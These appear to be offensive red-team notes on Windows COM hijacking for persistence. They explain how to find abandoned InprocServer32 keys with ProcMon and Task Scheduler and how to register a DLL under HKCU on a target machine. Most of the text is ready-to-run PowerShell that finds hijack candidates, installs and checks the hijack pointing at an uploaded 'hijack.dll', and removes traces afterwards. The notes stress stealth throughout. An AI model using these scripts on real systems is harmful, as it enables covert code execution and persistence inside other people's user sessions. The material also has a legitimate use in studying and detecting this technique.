Although it is possible to modify COM objects that are in use, doing so can break the applications that depend on them and costs stealth. A better approach is to look for abandoned registry keys: keys that an application tries to open on startup or during normal use but that do not actually exist in the registry hive, so creating them redirects the load without changing anything the application already relied on.
Finding Abandoned Keys (ProcMon)
Process Monitor (ProcMon) from the Sysinternals Suite is useful for hunting potential COM hijacks. If it cannot be run on the target machine, run it on your own machine first; a similar Windows version and build is probably necessary, since which keys are abandoned depends on the OS build and the installed software.
Set the filter to:
- Operation is RegOpenKey
- Result is NAME NOT FOUND
- Path ends with InprocServer32
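ProcMon can export the filtered event list as CSV (File > Save..., CSV format). The following PowerShell is an added example, not part of the original notes, that triages such an export: it keeps only RegOpenKey / NAME NOT FOUND events on an InprocServer32 path, extracts the CLSID, and checks whether that CLSID is registered under HKLM or HKCU today. The CSV text embedded below is constructed sample data in ProcMon's default column layout (the CLSID is the one from these notes); on a real log replace it with Import-Csv.

```powershell
# Added example, not part of the original notes: triage a ProcMon CSV export
# for abandoned InprocServer32 keys. The sample CSV below is constructed data
# in ProcMon's default column layout; use Import-Csv on a real export.
$sample = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1234567 AM","explorer.exe","4321","RegOpenKey","HKCU\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32","NAME NOT FOUND","Desired Access: Read"
"10:01:02.1234890 AM","explorer.exe","4321","RegOpenKey","HKCR\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32","SUCCESS","Desired Access: Read"
"10:01:03.0000000 AM","svchost.exe","1000","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","SUCCESS","Type: REG_SZ"
'@

function Get-AbandonedInprocServer32 {
    param([Parameter(Mandatory)][object[]]$Events)
    $seen = @{}
    foreach ($e in $Events) {
        # Same three conditions as the ProcMon filter in the notes.
        if ($e.Operation -ne 'RegOpenKey' -or $e.Result -ne 'NAME NOT FOUND') { continue }
        if ($e.Path -notmatch '\\CLSID\\(\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})\\InprocServer32$') { continue }
        $clsid = $Matches[1]
        # Report each (process, CLSID) pair once, however often it was probed.
        $k = "$($e.'Process Name')|$clsid"
        if ($seen.ContainsKey($k)) { continue }
        $seen[$k] = $true
        [pscustomobject]@{
            Process = $e.'Process Name'
            Clsid   = $clsid
            Path    = $e.Path
            # Where is the CLSID registered on this machine right now? A
            # medium-integrity process consults HKCU\Software\Classes first,
            # so "InHKLM = True, InHKCU = False" is still a hijack candidate.
            InHKLM  = Test-Path "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32"
            InHKCU  = Test-Path "HKCU:\Software\Classes\CLSID\$clsid\InprocServer32"
        }
    }
}

$events = $sample | ConvertFrom-Csv
# $events = Import-Csv -Path .\Logfile.CSV     # on a real ProcMon export
Get-AbandonedInprocServer32 -Events $events | Format-Table -AutoSize
```

Run it on the target (or on a matching build) so the InHKLM/InHKCU columns reflect the registry you intend to hijack. A candidate with InHKCU = False is usable either way: if InHKLM is also False the application currently fails the lookup entirely, and if InHKLM is True the per-user key you add will shadow the machine-wide one for non-elevated processes.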
Finding Abandoned Keys (Task Scheduler)
Another way to find candidate keys is through Task Scheduler. Some scheduled tasks run a COM handler instead of an executable; the task's action then names the handler's CLSID (visible in the task XML as the ComHandler action's ClassId). Say the CLSID is {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}. Check first whether the task is reboot-persistent (it has a boot or logon trigger), either in Task Scheduler or in PowerShell. Often the COM object is defined in HKCR: Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
. The same entry usually exists in HKLM, since HKCR is a merged view of HKLM\Software\Classes and HKCU\Software\Classes. The hijacking opportunity is HKCU: a non-elevated process consults the per-user Classes hive first, so if the CLSID has no InprocServer32 key under HKCU, creating one there redirects the load. Two caveats: elevated (high-integrity) processes ignore per-user COM registrations, so this only yields code execution as the user whose hive you write; and a 32-bit host process on 64-bit Windows reads the WOW6432Node view, so check which bitness the task's host runs as.
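The PowerShell below is an added example, not part of the original notes, that automates the Task Scheduler check: it lists every task whose action is a COM handler, reports whether it has a boot or logon trigger, and shows in which hive the handler's CLSID has an InprocServer32 key. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later), whose COM-handler action objects expose the CLSID as ClassId.

```powershell
# Added example, not part of the original notes. Requires the ScheduledTasks
# module (Get-ScheduledTask); the action/trigger CIM class names used below
# are the module's own (MSFT_TaskComHandlerAction, MSFT_TaskBootTrigger, ...).
function Get-ComHandlerTask {
    foreach ($task in Get-ScheduledTask) {
        # Only tasks whose action is a COM handler reference a CLSID.
        $comActions = @($task.Actions | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskComHandlerAction' })
        if ($comActions.Count -eq 0) { continue }

        # Reboot-persistent means it fires on boot or logon; on-demand tasks have no triggers.
        $triggerTypes = @($task.Triggers | ForEach-Object { $_.CimClass.CimClassName })
        $persistent = ($triggerTypes -contains 'MSFT_TaskBootTrigger') -or
                      ($triggerTypes -contains 'MSFT_TaskLogonTrigger')

        foreach ($a in $comActions) {
            $clsid = $a.ClassId
            [pscustomobject]@{
                TaskPath         = $task.TaskPath
                TaskName         = $task.TaskName
                State            = $task.State
                Clsid            = $clsid
                Triggers         = (($triggerTypes -replace '^MSFT_Task', '') -join ',')
                RebootPersistent = $persistent
                # HKCR is the merged view; HKLM and HKCU are the two sources behind it.
                InHKCR           = Test-Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
                InHKLM           = Test-Path "HKLM:\Software\Classes\CLSID\$clsid\InprocServer32"
                InHKCU           = Test-Path "HKCU:\Software\Classes\CLSID\$clsid\InprocServer32"
            }
        }
    }
}

# Candidates: fire at boot/logon, and the current user's hive has no InprocServer32 for them.
Get-ComHandlerTask |
    Where-Object { $_.RebootPersistent -and -not $_.InHKCU } |
    Format-Table TaskPath, TaskName, State, Clsid, Triggers, InHKLM -AutoSize
```

Run it as the user whose hive you plan to modify, since InHKCU is evaluated against that user's HKCU. The Triggers column is the quick way to confirm persistence without opening each task in the Task Scheduler UI.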
Hijacking
Say the steps above turn up a suitable abandoned key, for example HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32 showing up in the ProcMon event list with NAME NOT FOUND. Confirm that it really does not exist with Get-Item -Path "HKCU:\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32"
, which should fail with "Cannot find path ... because it does not exist".
To hijack the nonexistent key (after first uploading the DLL; the following runs on the target machine, not the attacker's), create the InprocServer32 key under HKCU, set its default value to the full path of the DLL, and add a ThreadingModel value (ideally matching the one in the HKLM registration, if there is one). The next time the application activates that CLSID, COM loads your DLL in-process.
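The PowerShell below is an added example, not part of the original notes, that performs that registration, verifies it, and also implements the clean-up step described at the end of these notes. The CLSID is the one from the notes; the DLL path ($env:APPDATA\hijack.dll) is an assumed upload location, not something the notes specify.

```powershell
# Added example, not part of the original notes: create, verify and remove the
# per-user InprocServer32 registration for an abandoned CLSID. The DLL path in
# the usage lines is an assumed location for the uploaded DLL.
function Install-ComHijack {
    param(
        [Parameter(Mandatory)][string]$Clsid,
        [Parameter(Mandatory)][string]$DllPath
    )
    $key = "HKCU:\Software\Classes\CLSID\$Clsid\InprocServer32"
    if (-not (Test-Path -LiteralPath $DllPath)) { throw "DLL not found: $DllPath" }
    # Refuse to overwrite a live registration: that breaks the app and costs stealth.
    if (Test-Path $key) { throw "$key already exists; not an abandoned key" }

    # Mirror the machine-wide ThreadingModel if there is one, so the hijacked
    # object behaves like the original; 'Both' is the safe default otherwise.
    $threadingModel = 'Both'
    $hklm = "HKLM:\Software\Classes\CLSID\$Clsid\InprocServer32"
    if (Test-Path $hklm) {
        $orig = (Get-ItemProperty -Path $hklm).ThreadingModel
        if ($orig) { $threadingModel = $orig }
    }

    New-Item -Path $key -Force | Out-Null          # -Force also creates the parent CLSID key
    Set-ItemProperty -Path $key -Name '(Default)' -Value $DllPath
    Set-ItemProperty -Path $key -Name 'ThreadingModel' -Value $threadingModel
}

function Test-ComHijack {
    param([Parameter(Mandatory)][string]$Clsid, [Parameter(Mandatory)][string]$DllPath)
    $key = "HKCU:\Software\Classes\CLSID\$Clsid\InprocServer32"
    if (-not (Test-Path $key)) { return $false }
    # The registry provider exposes the default value as the '(default)' property.
    return ((Get-ItemProperty -Path $key).'(default)' -eq $DllPath)
}

function Remove-ComHijack {
    param([Parameter(Mandatory)][string]$Clsid, [string]$DllPath)
    $key    = "HKCU:\Software\Classes\CLSID\$Clsid"
    $inproc = "$key\InprocServer32"
    if (Test-Path $inproc) { Remove-Item -Path $inproc -Recurse -Force }
    # Remove the parent CLSID key only if it is now empty (it may have pre-existed
    # with other subkeys that belong to a legitimate registration).
    if (Test-Path $key) {
        $parent = Get-Item -Path $key
        if ($parent.SubKeyCount -eq 0 -and $parent.ValueCount -eq 0) { Remove-Item -Path $key -Force }
    }
    # The DLL cannot be deleted while a process still has it loaded; end that
    # process (or wait for a logoff/reboot) first, then remove the file.
    if ($DllPath -and (Test-Path -LiteralPath $DllPath)) { Remove-Item -LiteralPath $DllPath -Force }
}

$clsid = '{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}'
$dll   = "$env:APPDATA\hijack.dll"     # assumed upload location
Install-ComHijack -Clsid $clsid -DllPath $dll
Test-ComHijack    -Clsid $clsid -DllPath $dll   # $true once the key points at the DLL
# When finished:
# Remove-ComHijack -Clsid $clsid -DllPath $dll
```

Run this as the user whose applications you expect to activate the CLSID; the key lives in that user's HKCU and elevated processes will not read it. Test-ComHijack is the same check as the Get-Item confirmation above, inverted: it should return $false before installation and $true afterwards.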
Clean up after yourself
Remember to delete both the registry entries you created under HKCU (the InprocServer32 key and, if you created it, its parent CLSID key) and the associated DLL file. The DLL stays locked while any process has it loaded, so end that process, or wait for a logoff or reboot, before removing the file; leaving a dangling InprocServer32 key that points at a missing DLL is itself a tell-tale artifact.